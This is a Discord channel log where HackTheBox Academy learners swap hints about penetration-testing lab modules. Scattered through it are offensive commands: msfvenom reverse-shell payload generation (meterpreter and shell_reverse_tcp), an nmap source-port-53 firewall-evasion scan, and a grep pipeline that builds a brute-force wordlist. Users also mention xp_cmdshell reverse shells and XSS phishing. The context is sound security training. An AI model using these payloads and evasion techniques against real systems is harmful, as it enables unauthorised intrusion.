#modules

1 messages · Page 47 of 1

hard dew
#

on to SMB this should be fun, Thanks @fathom pendant

fathom pendant
#

:D

sterile mirage
#

Hello, can someone please help me with this module: Active Infrastructure Identification

I have not been able to understand how to do it!

simple zephyr
#

Thats funny I couldnt get mssqlclient to work at all but sqsh. might be which box its running off of maybe reset the box

fathom pendant
sterile mirage
#

Target: 10.129.207.165

vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local

Is with this, how can I add the vhost to that ip?
When I enter /etc/ "hosts" does not exist.

thorn urchin
#

what are you running that you dont have /etc/hosts??

sterile mirage
#

┌─[htb-ac680638@htb-lzizkyuidx]─[/etc]
└──╼ $cd /etc/hosts
bash: cd: /etc/hosts: Not a directory
┌─[✗]─[htb-ac680638@htb-lzizkyuidx]─[/etc]

#

I'm pretty sure that yes, I'm doing something wrong, but I don't know what it is ..

graceful rampart
#

/etc/hosts: Not a directory

#

The error very clearly tells you exactly what your doing wrong

thorn urchin
sterile mirage
#

What I think is ok, yes, I'm not in the right directory, I should, but how do I do it, sorry for the question but I didn't quite understand what to do or how to enter the ip and add the vhosts.

#

I'm just starting in this...

hard dew
#

If your use to using a text editor, the HTB pwn box has an app called pluma you can use to edit files

#

or you can do it from cli, best to stick with what you know then learn the cool kid stuff later

dim cosmos
#

try sudo vim /etc/hosts

waxen barn
#

What tamper-script do I use to get flag11 on SQLMap Essentials?

dim cosmos
#

/etc/hosts is a fine bro not a dir

#
  • fiel
#
  • file LOL
thorn urchin
fathom pendant
#

yes; but you're not gonna learn that here

tulip copper
#

Im searching through the dc

#

looking for info on how to take snapshots since the interface in the setting up module doesn't look familar

#

not sure whether this is vmware pro??

fathom pendant
#

is it paid?

#

if not

#

then it's not pro

tulip copper
#

not paid

#

wait lemme sc

fathom pendant
#

to share screenshots/images you'll need to verify your hackthebox account in #bot-commands

tulip copper
#

ohkk

vital adder
fathom pendant
#

according to the linked thread @vital adder it's not possible

vital adder
#

Oh 🤣

fathom pendant
#

Lol it's ok

graceful rampart
#

Yea. You need vmware pro for snapshots

tulip copper
#

ic ty

ripe terrace
#

You can take a "snapshot" in vmware player, just shut it down, and copy the directory where all the associated .vmx* files are to another location. Then if you ever want to restore, copy those over your current files.

#

It's not elegant, but it works.

vital adder
#

Also guys sorry for not being active lately Offshore been really kicking me in my nut also right now I'm traveling (force by family) kek hopefully I could go back to normal after the prolabs

graceful rampart
#

Haha

#

Best of luck

vital adder
#

Thank but my nut hurts

graceful rampart
#

We're holding down the fort till you get back

#

😆

acoustic owl
fathom pendant
#

YES

acoustic owl
#

I am currently taking a forced break. My laptop had to go to the repair centre

#

I was always nice with him, really! 🙈

vital adder
#

I think the same thing happened to me haft way though the academy 🤣

acoustic owl
#

Did you also destroy a laptop? Mine no longer wanted to work 🤣

#

He switched off and was dead

#

CPTS was probably too hard for him 🤣🤪

vital adder
#

Nope my charger port just said I'm out one day and never come back for no reason 🤣

fathom pendant
#

oof

#

warrantied or nah?

vital adder
#

I think that was the last day or something

acoustic owl
#

I don't know exactly what is broken. But probably also the port for the charging cable.

acoustic owl
fathom pendant
#

if it's a Dell; generally you're gonna have decent luck getting it repaired under warranty even if it's on like the last day

vital adder
#

Oh yeah I think my charging cable was rusted and to this day still no idea how tf that happened

acoustic owl
#

you don't have to work with it outside in the rain 🤣

#

I think a little break is good for me.

fathom pendant
#

yes a personal break, not a computer break

#

xD

ripe terrace
#

Hey, can anyone remember which module went through setting up a cloud-based attack box, and more specifically, securing RDP with MFA etc.? For the life of me cannot find it.

graceful rampart
fathom pendant
graceful rampart
#

Yea

fathom pendant
#
  • depending on parts and labor availability
#

if you can't tell i've been shopping around

#

and looking at warranties

graceful rampart
#

Haha

fathom pendant
#

by far Dell has the best high-tier paid support

graceful rampart
#

I have an MSI laptop that I got about 5 years ago. Never had any issues with it. Thing is an absolute beast

fathom pendant
#

haven't heard much about MSI support

#

i've heard it's good tho

acoustic owl
graceful rampart
#

Ah makes sense

#

My dad always pays for the highest warranty available

fathom pendant
#

ah standard warranty so that send in is gonna be a week iirc

graceful rampart
#

Sounds about right

acoustic owl
#

Yes, i think so

#

I received an email yesterday that the repair is finished and they are now testing the device. They will probably send it back today

#

As I said, such a break after an exam is absolutely okay

#

I think HTB is already planning the next certificate. All the new modules point to another certificate in the web area....
Means, again a lot of learning and then again an exam.

graceful rampart
#

Yea. Seems like it

umbral river
#

Anyone about that knows question 2 of Brute Forcing Cookies??? Im stuck at the moment with using CyberChef. I can get it to decode the first part of the cookie. The middle is missing.

solid python
#

It doesn't include monthly cubes but you'll earn a lot by just doing modules

acoustic owl
rustic sage
#

helllllllllllo

#

i just start in hack wich module do you advice me

versed frost
#

can anyone help me with how to download xfreerdp tool on my parrot OS?

magic valve
#

I usually just utilize the vpn on my own Kali machine but the few times I have used HTB academy’s Parrot OS machine I thought I remember xfreerdp already being installed. Sorry if I am incorrect.

versed frost
#

you are correct, the machines that are in the website do have xfreerdp, but the problem is the screen does not show me the task bar of the windows machine that I am trying to get a connection on (for example I can not access the search bar to access programs) that is why I trying to download it to my vmware parrot OS but could not figure how

hot merlin
#

Hi all, I could use a push/DM from someone regarding this module:

AD Enumeration & Attacks - Skills Assessment Part II question:

Present the contents of the flag.txt file on the administrator's desktop on the SQL01 host.

via xp_commandshell i opened a reverse shell in powershell and am "nt service\mssql$sqlexpress" now i would need a hint to do privesc and become admin

magic valve
sinful falcon
hot merlin
#

but not work

#

it is a right way?

hot merlin
#

ok work

#

typo

meager topaz
#

My beef login page not working on WAN

#

can someone help me

novel matrix
meager topaz
#

i use correct password but not login & redrect to login page

novel matrix
meager topaz
#

module ? model are up to date

novel matrix
meager topaz
#

okay thanks

autumn pilot
#

careful with spoilers

tidal kelp
tropic turret
#

hello i am looking for help for the module login brute forcing /login form attacks

leaden quail
arctic sentinel
#

Anyone working with the easy lab of attacking common services?!?

rustic sage
#

Hii

arctic sentinel
#

I got the user but not the password... I`m going through rockyou wordlist but the time will end... I couldn't find the password in the list provided....

leaden quail
#

try it with medusa

arctic sentinel
#

Ok!

leaden quail
#

hydra will not find it, dont no why

arctic sentinel
#

medusa is running now!

high totem
#

Hey, could someone help me with Password Attacks Hard Lab? I tried brute forcing Johanna's password, but cannot get anything. I used password lists from the resources and rockyou.

woeful ermine
#

you prob need to use mut list you created before

high totem
high totem
woeful ermine
#

try creating smaller mut list

#

dont add everyting in it

high totem
woeful ermine
#

yeah but on which pass list

high totem
#

custom.rule on password.list

woeful ermine
#

I dont now pass not that hard it has one special character in the end thats all I can say

arctic sentinel
wintry gorge
#

anyone finished the crackmapexec skill assessment that can help me with some hint?

vast geyser
#

Hi there, Could someone tell me does wpscan can detection all the activating plugins? Because I found some vulnerable plugins on the admin page but wpscan don't detect them.

dense charm
#

hello guys i need help here please , i modified the db and changed the amount from 5 to 99999912 but nothing change in the game .. can someone tell me to do to debugging the amount in the game for the acc to modify the amount in the game ?

dim cosmos
#

hi guys I'm doing the Attacking Common Services SMTP exercises. I get the username using the RCPT mode with the enum -M command, all good, but when i telnet in to try and re-create this to check my understanding I just get "503 must have sender first"

#

any ideas why the RCPT mode in the script works but manually checking doesnt?

fathom pendant
#

Because VRFY is the command iirc

#

RCPT is the send mail

dim cosmos
#

in this exercise VRFY is disallowed

#

only the RCPT mode in the user-enum script works

fathom pendant
#

haven't done that but it tells you why you got the 503, it's because you haven't specified the send to email ¯_(ツ)_/¯

#

The script probably does some simple name@domain thing

dim cosmos
#

"

#

I just verified, that works

#

when you to RCPT TO:m....@inlanefreight.htb it comes back with 250 OK

#

if you put a wrong username it comes back "550 Unknown user"

#

interesting

#

thanks for your thoughts Marcie

fathom pendant
#

Probably why rcpt takes a bit longer

dim cosmos
#

yeh, I like to telnet into pop3/imap/smtp to take a look around before just firing up the scripts so i understand what is going on

#

now i need to brute force this dudes passwd

hot merlin
#

How did you find the hash of CT059, did you do a GetUserSPNs.py attack? It didn't find anything for me, I even looked with bloodhound

rustic sage
#

Hi - any nudges on brute forcing cookies question 2? I used the python script Decodify which gives me url -> base64 but this results in gibberish. Any help?

urban anvil
#

"sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53" can someone explain what is the use of --source-port ?

timber hatch
#

Modul Server Side Attacks, the Explanation for Apache Reverse Proxy & AJP installation does not work.

pliant sage
graceful rampart
#

It's not about what the service expects. It's about the firewall. For example, a firewall may block any traffic that originates from any non standard port. But if the machines behind the firewall need internet access, it would have to allow DNS which means if your packets originate from port 53 there's a good chance they will be allowed through

urban anvil
simple zephyr
#

Remote/Revserse Port Forwarding with SSH

msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

can someone check mypayload.

Metasploit

[*] 127.0.0.1 - Command shell session 56 closed.
[*] 127.0.0.1 - Command shell session 57 closed.
[*] 127.0.0.1 - Command shell session 58 closed.
[*] 127.0.0.1 - Command shell session 59 closed.
[*] 127.0.0.1 - Command shell session 60 closed.

SSH-R

debug1: client_input_channel_open: ctype forwarded-tcpip rchan 2 win 2097152 max 32768
debug1: client_request_forwarded_tcpip: listen 172.16.5.19 port 8080, originator 172.16.5.19 port 56488
debug1: connect_next: start for host 0.0.0.0 ([0.0.0.0]:8000)
debug1: connect_next: connect host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000
debug1: channel 1: free: 172.16.5.19, nchannels 2
debug1: channel 0: free: 172.16.5.19, nchannels 1

I did notice on the example it goes all the way to port 61356, am I suppose to just wait?

debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61356
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000
leaden quail
placid quest
#

@simple zephyr the problem is in payload option

umbral river
rustic sage
#

Hi could someone help me?, I am stuck in File Upload Atack Skills Assessment and I managed to know the name of the directory where the files are uploaded, but when I try to add the name of a file that I have uploaded but it gives me 404 not found. I think I am in the correct path because I write the name of the folder and the date before the file. I tried with a normal jpeg but it doesn´t show

simple zephyr
placid quest
#

@simple zephyr U need to change the payload options to what u used when creating a payload

arctic sentinel
#

Hello! I`m working with the easy lab of attacking common services module! I got username and password but I can't any way to upload a shell... could I use msfconsole... I'm trying some modules but no luck...

patent obsidian
#

hello can you help me.
I am in the SESSION SECURITY - Skills Assessment module.

arctic sentinel
#

Anyone working with the attacking common services module?!

boreal meteor
#

Hey guys! I am in need of some help with a certain exercise that I've been struggling with for the past hour. I'm currently in the 'Repeating Requests' section of the 'Using Web Proxies' module, and no matter what I try using BurpSuite, I just can't get a hold of the second flag. What I've constantly tried is repeating commands like 'ls, pwd, cat, etc...' on the directories that I have, but all to no avail. I'll keep grinding at it, but if someone could help, I would appreciate it 😉

paper cedar
#

guys tell me how i should start hacking and making codes

graceful rampart
last fox
#

trying to connect to the target spawned through a browser or mysql doesn't seem to work

#

tried both with and without port specified

#

nevermind im dumb

#

i was typoing the ip

weak stirrup
#

i am having trouble the final step in https://academy.hackthebox.com/module/31/section/599. i have a python program written to make an input which i believe changes the stack to return a "leavemsg" call to the middle of a noop field that falls into a reverse proxy but it does not work and i can not see what i missed or what i am doing wrong. i would appreciate some hints on how to figure out what i am doing wrong in gdb.

drifting glacier
#

What's a man got to do to discover the FTP port for the Attacking FTP section in the Attacking Common Services module? having flags -p 1-65335, -p-, -T 4 pr -T 5, aren't working in discovering the port

#

22, 53, 139, 445 are the only ones that keep showing up no matter what i try

autumn pilot
#

have you tried resetting the target

drifting glacier
autumn pilot
#

you are running nmap with sudo rights, correct?

drifting glacier
#

that , i was not doing,

#

attempting with sudo

#

Fucking hell,it was the sudo lol. Thanks @autumn pilot

weak stirrup
#

i requested help on the academy web site should i see something on the discord service from this request?

autumn pilot
#

someone will reach out to you as soon as possible

weak stirrup
#

ok thanks

#

is there some way to extend my instances alive time or will i need to recreate everything again?

autumn pilot
#

90 minutes fixed, unless it is an exam

#

usually 90 minutes is more than enough to finish an exercise

arctic sentinel
drifting glacier
#

Still had to reset the box 2 more times though lol

arctic sentinel
#

Anyone working with the easy lab of attacking common services?!?!

autumn pilot
#

some of the scripts/methods that nmap will use might require a sudo privilege to access certain ports/sockets and etc

drifting glacier
drifting glacier
arctic sentinel
#

I`ve been stuck for a while... hopefully this evening I will get some inspiration haaha

autumn pilot
#

let's not dump everything, but rather try to explain it with your own words what you have tried

#

rather than pasting the commands and outputs

valid sinew
autumn pilot
#

I can see a working command there

valid sinew
#

Is it the last one as some said do it without the -i flag but was still stuck

autumn pilot
#

nope

valid sinew
#

Ok let me try with them and come back to you on this

autumn pilot
valid sinew
#

Ok tried this one no luck - curl -H ‘Authorization: Basic YWRtaW46YWRtaW4=’ http:// 178.128.163.230:31903

#

Also cannot copy from my local machine and paste in the VM 😦

#

So annoying have to log into my evernote

autumn pilot
#

make sure to use the proper quotes as some of them are formatted and shells are not fans of that

valid sinew
#

ok let me try some of them will go through them and post here my findings

#

Do you know how to enable copy and paste between the vm and my local machine as i can copy and paste from VM to my local machine but not the other way around 😦

#

So have tried this one

#

curl 'http:// 178.128.163.230:31903/search.php?search=le' -H 'Authorization: Basic YWRtaW46YWRtaW4=

#

Get this error back: curl: (3) URL using bad/illegal format or missing URL

hot merlin
autumn pilot
#

look at your command

hot merlin
#

I have used crackmapexec

#

And rockyou

valid sinew
#

Comes back blank

autumn pilot
#

have you asked yourself why it could come blank

valid sinew
#

Because i have not included the authentication parameter

autumn pilot
#

do you need one?

valid sinew
#

Yes in the cheat sheet it said to include it

autumn pilot
#

but why

#

is my next question

valid sinew
#

Don't forget to set the user credentials when you send the 'search' request

autumn pilot
#

Cookies are not the only way of authenticating via curl

valid sinew
#

Thinking......🫤

foggy bone
#

Why does HTB not direct you to start or tell you to sign up for the academy? Just curious as I was struggling to start and a lot of people were asking the same question online

valid sinew
#

Other way to authenticate is through the URL vs using CRUL

autumn pilot
foggy bone
#

I see, that’s a bit confusing

valid sinew
autumn pilot
#

HTB (not academy) is the first one that was created

#

and it was meant for people to push themselves into learning things that they don't know

#

or partly know

foggy bone
#

So academy is the way to go if you want to learn gotcha

valid sinew
#

I dont know any of this. i am sys admin but out of work and this is my only hope now

thorn urchin
#

I think the high level super separation HTB does is a bit of a mistake, but its too baked into all the systems to really do anything about it now.

valid sinew
#

I am doing academy

thorn urchin
#

like its extremely weird that you have to have two seperate accounts. From an end user perspective it doesnt make any sense.

foggy bone
#

Yeah that’s what threw me off was trying to sign into the academy with the regular HTB credentials

#

Realized I have to make a separate account

valid sinew
#

Silly me was putting the command in vs searching for the flag

#

thanks for your help

fervent harness
#

hey anyone who has done bloodhound module. anyone getting this error?

thorn urchin
#

Not done that module but its a pretty classic error

#

your ingestor is from a too incompatible version of bloodhound

#

need to either update your Bloodhound or update your ingestor and run again

autumn pilot
fervent harness
#

lol im using the ingested items given to me by the module. guess ill downgrade

#

or a converter even better

#

❤️ much love to you guys and the community for quick response

thorn urchin
#

I know some people that run a docker container specifically for bloodhound to make sure everything is compatible and in sync

fervent harness
#

awesome ima try some options

#

havent used bloodhound in a while but I am about to take the OSEP exam so I need to get it set back up

fervent harness
pallid gate
magic valve
#

I would greatly appreciate some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack. Been stuck for a day.

I have found user and password and I know the ip for the MS01 box but have tried multiple ways in logging into it with found credentials.

magic valve
#

I have tried that and just tried again. Get an WinRMAuthorizationError.

magic valve
leaden quail
#

sure

hallow remnant
#

Man, I'm finding the Academy modules to be slow to respond

#

*edit: the machines within the Academy modules

magic valve
# leaden quail sure

I’m a noob with discord..when clicking on your username and clicking the message icon your user doesn’t come up. Also searched for your username and doesn’t come up. Lol

weak stirrup
#

what is meant by 'config file' in this question "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?" in module https://academy.hackthebox.com/module/18/section/81 .. i have assumed *.conf i have a find command that gives back a single file with wha ti think are the stipulations but it is not accepted. ideas?

#

figured it out... it wanted jsut the file name not the entire location

flat oxide
#

Anyone know why zap browser don't load HUD?

surreal rain
#

Ad blocker probably

thorn urchin
#

sometimes zap just doesnt work for me period. Not a fan. good to be aware that it exists though

twilit obsidian
#

hi.. doing som sql modules and can not connect to. have: error 2002 (HY000) cant connect to local MYSQL server through socket '/run/mysqld/mysqld.sock' and using correct command which is: mysql -u root +ip -P port -ppassword

#

and it takes time to connect.. hmm..

hallow remnant
#

"The Live Engagement" (Shells & Payload)

I feel silly asking this, but for the life of me I cannot find a browser in the foothold machine we're given in order to browse the various target web servers. Am I meant to tunnel my traffic back to my actual machine (vs. the foothold VM)?

woeful ermine
#

Any nudge on Command Injections/Skill assessment? I think I found the vulnerable part as it gives a "malicious request denied!" error. But that is the only thing I ve got. I couldnt find any working command. If I didnt miss something, I tried everything on the module. Nothing works psyduck The only working command gave me the flag kek

flat oxide
thorn urchin
flat oxide
iron basin
#

Attacking email services - I have found the creds, however I am struggling with logging in as I am unable to login to all three services. Any help?

storm jackal
quiet lake
#

im having an issue with a basic one, and its bothering me
tier 1, starting point, machine 'Three' with the bowling pin icon

#

I dont understand what is wrong, seeing as even referring to the walkthrough results in the same issue

quiet lake
#

i see

iron basin
#

Attacking SQL databases - I was able to login but only with mssqlclient.py, not sqsh. If anyone was successful in logging in via sqsh would yall mind dm'ing me I'd like to see how that method works. Cause currently I am unable to.

wet bison
#

hi,
so I'm currently trying to solve the challenge for the phishing section of the XSS Module. I figured out a working XSS payload and created an url, which injects a malicious login form into the html code, as requested by the challenge. If I try that url myself it works perfectly fine and the credentials are being sent to the my webserver as intended. But if I send the url to the "victim" I just receive the error "Issue in sending URL!". Does anyone have a clue, what could be causing that?
I know it's probably hard to tell without seeing the actual payload, but as far as I know, I'm not allowed to post that here, right?

toxic spire
#

Hello guys, im doing the Firewall and IDS/IPS Evasion - Medium lab.

Im using this command: sudo nmap $IP -p53-sS -Pn -n --disable-arp-ping --packet-trace --source-port 53, so i can pass through the filtered 53 port, but instead of saying open, still say´s filtered

#

how can i find a way to open the filtered port, so i can connext via ncat?

arctic sentinel
#

Good evening, Anyone working with the attacking common services easy Lab!!!

sly tapir
#

Does it take a while for the Nessus Skills Assessment to load?

thorn urchin
#

yes

#

red teaming? no

brittle merlin
#

Hello. I finally got my discord working. I am new to hacking and studying to become a Ptester. As well as python. I am stuck on a question on linux and was looking for someone to point me in the right direction

acoustic owl
dim wolf
#

i am master of footprinting

#

footprinting labs were cool

graceful rampart
#

not at all. Red teamers dont use nessus. Pentesters sometimes use it but not red teamers

hard dew
#

I haven't done that module but is there a domain associated with that account ie. WORKGROUP or DOMAIN.XYZ

dim wolf
#

if you can't find the account name on the box you're logged in to then you might be able to find it somewhere else.
blatant hint: ||check the domain controller.||

cobalt trench
#

Hey everyone, I'm not looking for the answer to this problem but if anybody can point me in the right direction to find the answer would be greatly appreciated

#

Been stuck on this for a while

thorn urchin
#

sounds like the format of your id_rsa key isnt valid

dim cosmos
#

does it need to be unencrypted?

#

might be why it is showing invalid format

cobalt trench
#

Fixed it

#

I copied and pasted it into note pad and then copy pasted it into CL and it worked

#

not sure what was wrong with it but that fixed it

graceful rampart
#

Ok, so i have a question about log poisoning. Im on the skills assesment for file inclusion. Cant really say what my issue is without giving away half the skills assesment so if anyone who finished that module is around to help out id greatly appreciate it

thorn urchin
graceful rampart
thorn urchin
#

second thing is that you can access the error log after it messes up to get the php error output

graceful rampart
#

I cannot believe i didnt think of that

thorn urchin
#

if it makes you feel better I originally learned that lesson about 14ish years ago against a live target for a malaysian webstore.

graceful rampart
#

Yea. Now that im thinkign about it it makes sense. Again , i cant believe i didnt think of that

#

thanks for the nudge

thorn urchin
#

the payload was also super finicky for me. I had to do it in burp

graceful rampart
#

gotcha

#

I got it. And now i see why the payload didnt work lmao

#

thats so annoying

fathom pendant
#

Mood

graceful rampart
hard dew
#

dnsenum sure is one of those hurry up and wait... a life time for the scan to complete

cerulean scroll
#

hey everyone, im stuck on the knowledge check in the getting started module. Got a shell and the user flag, but unsure how to escalate privileges. sudo -l shows: "User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php"

#

I remember this from a previous module but when I try to run the command as root it does nothing. no error, no ouput or anything.

#

Can anyone provide me with a little nudge in the right direction?

dim wolf
cerulean scroll
#

"sudo -u root /usr/bin/php <command>"

waxen barn
dim wolf
#

||you don't need to specify -u root||

glacial matrix
#

Hi!
you passed it? brute forcing the support.us account by grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$' > testlist.txt wordlist, but can't login too

cerulean scroll
dim wolf
#

it's linking to my spoilered message

hollow lagoon
#

Hii

dim wolf
#

might be a shell issue as well, i don't remember everything but i was trying to do linux privesc on a box using gtfobins and the commands just wouldn't work until i used a more stable shell

cerulean scroll
#

I was thinking that as well. When I run "sudo su /usr/bin/php" the output is just blank and I cant do anything

#

wait not that

dim wolf
#

did you try running the set of commands on gtfobins?

cerulean scroll
dim wolf
#

there's a search bar on the site, try looking up php

cerulean scroll
#

Thanks! Maybe file upload? To get linenum.sh uploaded

dim wolf
#

iirc that should be on the box already

cerulean scroll
#

or do I not even need linenum.sh now.. Damnit I'm confused haha.,

dim wolf
#

usually if sudo -l returns a command you can run as root you won't need an automated enumeration tool for privilege escalation paths

cerulean scroll
#

Right, okay, thats what I just now realized. Hmm..

#

So this is where the PHP commands from gtfobins would come in handy yes?

dim wolf
#

i would say they're worth a shot

cerulean scroll
umbral river
#

anyone around that has done the skills assessment for broken authentication?
just got it!

#

@glacial matrix I would hint at making sure you are using the restrictions for passwords in your grep

turbid lily
#

Hi, I'm trapped at "AD Enumeration & Attacks - Skills Assessment Part I" in question 4: "Submit the contents of the flag.txt file on the Administrator desktop on MS01 ". Any hints about how to get the IP address for MS01? I only need that hint

leaden quail
glacial matrix
#

i miss the ":" and
what should I do next?

turbid lily
glacial matrix
leaden quail
#

you asked how to figure out the IP-Adress of MS01

turbid lily
#

Also, even If I Do, there might be multiple machines and I have to know which one of those is MS01

leaden quail
#

Have you done "Pivoting, Tunneling, and Port Forwarding" Module?

turbid lily
#

Yes, but it is a Active Directory Module related. So it is more directly related with Domains

leaden quail
ivory hollow
#

Hi all

in footprinting module... section ipmi. in ladt question we have to prove the password. which needs to be brute force with hastcat. does hashcat take too much time to crack it. i use the command hashcat -m 7300 ipmi.txt -a 3.
Please let me know.

Thanks 👍

vital adder
#

sure also you may want to remove spoiler

vital adder
ivory hollow
#

@autumn pilot @vital adder . i used the same commands which is given in the section but it already takes half an hour. i use rockyou list with john tool.

autumn pilot
#

are you sure you are not using the rockyou archive rather than the txt file

uneven girder
#

Hello, hope everyone is good.
I need some help in a web challenge called weather app.
I've been working on it for several days now and I'm stumped.
Can someone dm me for some hints or just a nudge.
I can list a few things I already tried and didn't work.
Thanksss

ivory hollow
#

@autumn pilot i am using rockyoy.txt.....

versed frost
#

anyone had issue when trying to RDP to the windows machine in shells & payloads module. when ever I use xfreerdp to connect to the machine, it disconnect after one minute saying there is an error. can someone help?

#

even after I try to connect again, it says failed to connect

arctic sentinel
ivory hollow
#

thanks 👍 @autumn pilot @vital adder .... i cracked it.

arctic sentinel
#

Good morning, anyone who can provide some hints with the attacking common services easy lab! I'm halfway but currently running out of ideas...

autumn pilot
#

use some of the commands from previous sections

arctic sentinel
#

I`m going through several in mysql but no luck...

dim cosmos
#

i just finished the attacking common services hard lab and i need a strong drink and a shower from the sweat

dim cosmos
#

you'll also need to work out how to put up a webshell and where to drop it

#

the phpinfo page might be worth looking at 😉

arctic sentinel
#

I got credentials but can`t find how to locate the file where the php web page is located...

#

should I be able to log in through ftp?

dim cosmos
#

check all your ftp ports, there is a mention of a https service also

#

the key question is how can you upload a bit of php to an area where you can get the server to execute it by browsing to that php page

#

there is apparently another way of doing it but thats how i did it

#

i think there is a text file lying around that host which can help answer the above 😉

#

you'll get there mate

#

you'll be pleased to know the "easy" lab is way harder than the medium lab

#

and the hard lab is hard lol

arctic sentinel
#

Hahahahahah

#

I understand what I need to do but I don`t see how... I upload through the mysql console I assume...

dim cosmos
#

yeh you may want to investigate select into outfile............

#

thats enough help from me LOL

arctic sentinel
#

everytime I need to deal with SQL I`m screwed...

dim cosmos
#

the command you need is in the module

#

you just need to work out what php you need and where to send it

arctic sentinel
#

I must change this command but I don`t know from where to start...

dim cosmos
#

well firstly you're trying to send to a linux directory when you are on a windows box

#

secondly you are missing the first part of the SELECT ... INTO OUTFILE (i.e. select!)

#

but your general idea is right

arctic sentinel
#

Thanks!! I will keep trying...

dim cosmos
#

good luck, im sure we'll talk again when you get to the hard lab....

little wyvern
#

Hi could you help me? Module 147 and section 1320 I am at "Credential Hunting in Linux"finally I was able to log in as Kira but i cant find anything after that. Cannot read shadow file..where can I find Will password? somebody give me a hint what to do? Thanks

simple zephyr
#

can someone help me out with Meterpreter Tunneling & Port Forwarding I have a few questions with the payload

#
p3tA00@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
#

are they meant not to provide you with a payload that works? I found one that does finally and I get my connection back using

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.10 -f elf -o backupjob3 LPORT=8
#

ignore the IP's i just copied from the module

whole sigil
#

Any one doing Dante-Pro labs? I am having my time with some machine. Just rooted NIX-01, 02. Any one up there?prolabs_dante

whole sigil
simple zephyr
#

I am going to DM you

proud pine
simple zephyr
#

no i was using meterpreter, but got this error

#
ubuntu@WEB01:~$ ./backupjob1 
Segmentation fault (core dumped)
#

and i would get session closed on the meterpreter

proud pine
#

Is the box x64?

#

Nevermind, both were x64 payloads.

#

I don't see any reason it shouldn't have worked, unless there was a problem in transfer.

fathom pendant
rustic sage
#

Hi everyone. I just joined and is taking the p-test path, on the Linux mod I was wondering if there is a hacking game a noob like me can play on htb. Or do I need to learn a little more. My programme language is a python novice.

waxen barn
#

Has anyone figured out flag11 (case11) on SQLMap Essentials? I've tried the tamper=between and tamper-=space2comment, as well as quite a few others. I've also increased the level and risk. No luck. Any help would be much appreciated!

dim wolf
waxen barn
dim wolf
#

although Information Security Foundations is an essential path if you want a deep understanding

iron basin
#

Attacking Common Services - Attacking SQL Databases: Man I am a bit stumped, tried using mssqlclient.py and it works it however will eventually lag out. But after this I am stuck on figuring out how to traverse after logging in(hopefully there is a more stable way to log in.). Anyone mind nudging me in the right direction?

sly nebula
#

I'm not sure it's an error, so I'll rather post it here. Course "HTTPS/TLS Attacks", section "Bleichenbacher & DROWN".
"Download the zip file from the question above. You were able to capture TLS traffic between a client and the target server that you want to decrypt. Execute a Bleichenbacher Attack to obtain the premaster secret. Enter the unpadded premaster secret. The attack may take up to 30 minutes. Note: The IP address in the pcap file is different so you cannot use the -pcap option. Look at the help of the tool and find a way to pass the encrypted premaster secret to execute the attack."
Actually, the -pcap option can be used. Just port forward 127.0.0.1:443 to the remote endpoint, e.g. socat TCP-LISTEN:443,fork TCP:138.68.177.6:32396

sly nebula
#

By the way, that same endpoint does not seem to be working.
EDIT: working now, after a restart.

uneven falcon
#

can someone help me with that?

autumn pilot
#

from which module/section is that

iron basin
#

What tools do yall use to pass the hash?

uneven falcon
vital adder
#

this is not the channel for that

uneven falcon
vital adder
vital adder
autumn pilot
#

this channel is only for discussion about sections or modules in academy

vital adder
autumn pilot
vital adder
# rustic sage Hi everyone. I just joined and is taking the p-test path, on the Linux mod I was...

if you need some more hacking knowledge give both of these video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

Introductory video on getting into hacking and cybersecurity.

▶ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2023-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:41 - Intigriti Sponsorship
2:01 - Important Notes
4:12 - Building a Foundation
5:14 - Basic IT Skills
8:22 - Networking Skills
12:35 - Linux Skills
15:07 ...

▶ Play video
iron basin
iron basin
# autumn pilot what do you want to do

Im working on Attacking Common Services - Attacking SQL databases: Captured the hash of the svc account and now trying to figure out how to pass it back to login with that service account to the mssql service.

autumn pilot
#

have you tried to crack it?

vital adder
iron basin
autumn pilot
#

play around with it a bit and you will get it

vital adder
vital adder
vital adder
iron basin
#

Attacking Common Services - Attacking SQL Databases: IF anyone needs help or guidance please feel free to dm me in the future. As well as for other sections in the module. Finally got the flag and only thing left is the labs at the end of the section.

proud moon
#

So under module "Getting Started" first optional exercise it wants us to grab the banner. I have no clue what I'm doing wrong when I try ( nc ipaddress port) with it stating "time out". Any assistance would be appreciated ! ( path pen tester / getting started / basic tools)

proud moon
#

id input the screen shot but it wont let me

iron basin
#

@proud moon Are you using the pwnbox? And what command are you running?

shadow nest
#

Hello

proud moon
#

yea pwnbox

#

nc ipaddress 22

shadow nest
#

Whenever I try to setup a netcat listener it’s unsuccessful

#

I tried it on 2 boxes so far

iron basin
#

@proud moon Look at the target number highlighted in green in the question section. What else beside and IP address is attached to it?

#

@shadow nest Can ya show what command ya running? typical netcat listener is nc -lvnp (desired port)

shadow nest
#

I tried the most simplest php shells

#

Yes I tried nc -lnvp 1234

#

I am following the walkthrough step by step

#

One box is the Log4J

proud moon
#

@iron basin are you talking about the ":" after the target ip address?

iron basin
proud moon
#

what in the world, I tried that before and it didnt work lol

#

